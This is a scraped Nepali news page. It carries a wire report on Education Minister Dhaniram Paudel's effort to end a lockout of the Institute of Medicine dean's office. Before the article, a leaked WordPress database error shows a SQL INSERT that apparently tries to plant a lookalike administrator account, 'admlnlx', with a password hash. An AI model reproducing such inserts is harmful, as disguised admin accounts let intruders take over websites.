WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BszZSaFJb9./Og6v57W6Edciod4P39/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 15:14:38', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७ –
शिक्षामन्त्री धनिराम पौडेलले चिकित्साशास्त्र अध्ययन संस्थान (आइओएम)का डिन कार्यालयमा जारी तालाबन्दी खुलाउन पहल गर्नुभएको छ ।
चिकित्सक डा गोविन्द केसीको मागपछि वरिष्ठताका आधारमा नवनियुक्त डिन जगदीश अग्रवालको राजीनामाको माग गर्दै असन्तुष्टको समूहले तालाबन्दी जारी राखेको छ ।
मन्त्री पौडेलले आइओएमका डिन अग्रवाललाई बुधबार राति आफ्नो निवासमा बोलाएर असन्तुष्ट पक्षको चित्त बुझाएर तालाबन्दी खोल्ने वातावरण सिर्जना गर्न निर्देशन दिनुभएको हो । उहाँले असन्तुष्ट पक्षलाई सहमतिमा ल्याउन डाक्टर गोविन्द केसीको समेत सहयोग खोजिने बताउनुभयो ।
डा। सुरेश उप्रेती संयोजकत्वको सङ्घर्ष समितिले डिन अग्रवालले राजीनामा नदिएसम्म तालाबन्दी नखोल्ने अडान लिएको छ । – रासस